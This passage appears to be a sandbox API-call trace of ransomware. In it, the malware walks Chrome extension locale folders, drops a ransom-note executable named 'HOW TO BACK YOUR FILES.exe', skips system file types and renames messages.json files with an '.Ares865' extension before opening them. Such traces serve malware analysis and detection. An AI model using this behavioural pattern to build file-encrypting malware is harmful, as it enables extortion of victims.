ftLastWriteTime.dwLowDateTime=0x4e2c6260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.809] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.809] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.809] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.809] lstrlenW (lpString="messages.json") returned 13 [0100.809] lstrlenW (lpString="Ares865") returned 7 [0100.809] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.809] lstrlenW (lpString=".dll") returned 4 [0100.809] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.809] lstrlenW (lpString=".lnk") returned 4 [0100.809] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.809] lstrlenW (lpString=".ini") returned 4 [0100.809] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.809] lstrlenW (lpString=".sys") returned 4 [0100.809] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.809] lstrlenW (lpString="messages.json") returned 13 [0100.809] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.Ares865") returned 163 [0100.809] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.812] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=258) returned 1 [0100.815] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi" [0100.815] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi" [0100.815] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.815] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.815] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.816] GetLastError () returned 0x0 [0100.816] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.816] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2c6260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2c6260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.816] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.816] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.816] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.816] lstrlenW (lpString="messages.json") returned 13 [0100.816] lstrlenW (lpString="Ares865") returned 7 [0100.816] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.816] lstrlenW (lpString=".dll") returned 4 [0100.816] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.816] lstrlenW (lpString=".lnk") returned 4 [0100.816] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.817] lstrlenW (lpString=".ini") returned 4 [0100.817] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.817] lstrlenW (lpString=".sys") returned 4 [0100.817] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.817] lstrlenW (lpString="messages.json") returned 13 [0100.817] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.Ares865") returned 160 [0100.817] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.818] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0100.821] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk" [0100.822] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk" [0100.822] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.822] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.822] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.823] GetLastError () returned 0x0 [0100.823] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.823] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2c6260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2c6260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.823] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.823] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.823] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.823] lstrlenW (lpString="messages.json") returned 13 [0100.823] lstrlenW (lpString="Ares865") returned 7 [0100.823] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.823] lstrlenW (lpString=".dll") returned 4 [0100.823] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.823] lstrlenW (lpString=".lnk") returned 4 [0100.823] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.823] lstrlenW (lpString=".ini") returned 4 [0100.823] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.823] lstrlenW (lpString=".sys") returned 4 [0100.823] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.823] lstrlenW (lpString="messages.json") returned 13 [0100.824] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.Ares865") returned 160 [0100.824] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.826] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=304) returned 1 [0100.829] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr" [0100.830] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr" [0100.830] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.830] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.831] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.831] GetLastError () returned 0x0 [0100.832] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.832] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2c6260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2c6260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.832] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.832] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.832] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.832] lstrlenW (lpString="messages.json") returned 13 [0100.832] lstrlenW (lpString="Ares865") returned 7 [0100.832] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.832] lstrlenW (lpString=".dll") returned 4 [0100.832] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.832] lstrlenW (lpString=".lnk") returned 4 [0100.832] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.832] lstrlenW (lpString=".ini") returned 4 [0100.832] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.832] lstrlenW (lpString=".sys") returned 4 [0100.832] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.832] lstrlenW (lpString="messages.json") returned 13 [0100.832] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.Ares865") returned 160 [0100.832] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.834] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=234) returned 1 [0100.837] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th" [0100.837] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th" [0100.837] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.837] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.838] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.838] GetLastError () returned 0x0 [0100.838] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.838] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2ec3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2ec3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.839] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.839] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.839] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.839] lstrlenW (lpString="messages.json") returned 13 [0100.839] lstrlenW (lpString="Ares865") returned 7 [0100.839] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.839] lstrlenW (lpString=".dll") returned 4 [0100.839] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.839] lstrlenW (lpString=".lnk") returned 4 [0100.839] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.839] lstrlenW (lpString=".ini") returned 4 [0100.839] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.839] lstrlenW (lpString=".sys") returned 4 [0100.839] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.839] lstrlenW (lpString="messages.json") returned 13 [0100.839] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.Ares865") returned 160 [0100.839] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.841] GetFileSizeEx (in: 